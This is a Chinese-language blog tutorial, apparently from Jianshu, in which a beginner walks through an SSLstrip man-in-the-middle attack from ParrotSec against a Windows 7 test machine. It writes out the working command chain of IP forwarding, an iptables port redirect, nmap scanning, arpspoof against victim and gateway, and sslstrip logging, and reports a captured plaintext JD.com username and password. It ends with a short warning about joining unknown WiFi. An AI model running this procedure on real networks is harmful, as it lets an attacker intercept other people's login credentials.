簡單說說利用parrot進(jìn)行SSLstrip

簡單說說利用parrot進(jìn)行SSLstrip

0x00前記

今天看了個(gè)視頻,學(xué)習(xí)到了如何進(jìn)行 SSLstrip.我們ParrotSec作為一個(gè)滲透測試系統(tǒng),在論壇里竟然沒有看到這個(gè)的教程,我就來補(bǔ)一個(gè)缺,順便作為學(xué)習(xí)筆記.由于剛剛學(xué)會(huì),只知道如何操作,不懂原理.如果有知道的大神可以在評論區(qū)為大家補(bǔ)充.

在這里我演示會(huì)使用到 ParrotSec和虛擬機(jī) Windows7.

0x01介紹

我們的目標(biāo)是嘗試訪問使用 https 網(wǎng)站的用戶. 路由器(網(wǎng)關(guān))會(huì)把受害者的訪問請求發(fā)送給我們,而攻擊者會(huì)把 https 轉(zhuǎn)換成 http 協(xié)議,然后扣下報(bào)文中的 用戶名密碼. 攻擊者會(huì)把請求報(bào)文發(fā)回給路由器(網(wǎng)關(guān)). 然后路由器會(huì)把這個(gè)新的請求發(fā)送給網(wǎng)站,這就是大概的攻擊機(jī)制.

----以上來自視頻字幕

0x02具體步驟

實(shí)施攻擊的時(shí)候我們需要和目標(biāo)機(jī)在同一局域網(wǎng),也需要獲取到目標(biāo)主機(jī)的ip地址.

首先我們需要打開終端,輸入 ifconfig 來查看我們的網(wǎng)卡

ifconfig
1.png

eth0代表有線網(wǎng)卡,wlan0代表無線網(wǎng)卡. 我使用到的是WiFi無線連接,所以查看wlan0這里,記住自己的ip地址后面需要使用.

接下來我們需要輸入一條命令

 echo 1 > /proc/sys/net/ipv4/ip_forward

這條命令具體什么意思我也不是很清楚,好像是把輸出重定向到ip_forward這個(gè)文件

2.png

他這里顯示Permission denied(拒絕訪問),我們進(jìn)入root用戶,再執(zhí)行一次,成功了.

接下來配置路由表(iptables),把80端口的數(shù)據(jù)傳送到8080端口,也就是SSL欺騙需要監(jiān)聽的端口

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

現(xiàn)在我們需要找到網(wǎng)關(guān)的IP地址,輸入 route -n, GateWay 顯示的就是網(wǎng)關(guān)地址了

3.png

這里是192.168.1.1,這個(gè)要記下來

現(xiàn)在使用nmap獲取目標(biāo)主機(jī)的地址,在終端輸入

nmap -sS -O
4.png

我也不知道為什么好像只查到了網(wǎng)關(guān)的ip,而目標(biāo)機(jī)的ip沒有nmap出來, 請大佬指教

現(xiàn)在作個(gè)小小的弊,直接在目標(biāo)機(jī)上查到了ip,為192.168.1.100 (⊙﹏⊙)b

接下來我們進(jìn)行欺騙

arpspoof -i [網(wǎng)卡] -t [目標(biāo)ip] [網(wǎng)關(guān)ip]
arpspoof -i wlan0 -t 192.168.1.100 192.168.1.1
5.png

然后新開一個(gè)終端開始監(jiān)聽

sslstrip -l 8080
66.png

好這樣就準(zhǔn)備完成了,只需要等待目標(biāo)機(jī)進(jìn)行登錄操作我們就可以截取到報(bào)文

現(xiàn)在我們做一個(gè)測試,用目標(biāo)機(jī)打開jd,可以看到 https變成了 http

77.png

我們嘗試著輸入賬戶密碼, 登錄成功

6.png

8.png

打開終端,輸入cat sslstrip.log

cat sslstrip.log
9.png

可以看到報(bào)文最后一條是jd的,里面明文顯示這我的賬號和密碼.

所以 成功了 就這樣

0x03后記

其實(shí)大家生活中要注意一點(diǎn)不要隨意連接不明WiFi,賬戶密碼很容易泄露. 我還測試了一下taobao的密碼是加密的,jd沒有加密就這樣明文發(fā)送

小小萌新露個(gè)臉,大佬輕噴

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請結(jié)合常識與多方信息審慎甄別。
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡書系信息發(fā)布平臺,僅提供信息存儲服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

友情鏈接更多精彩內(nèi)容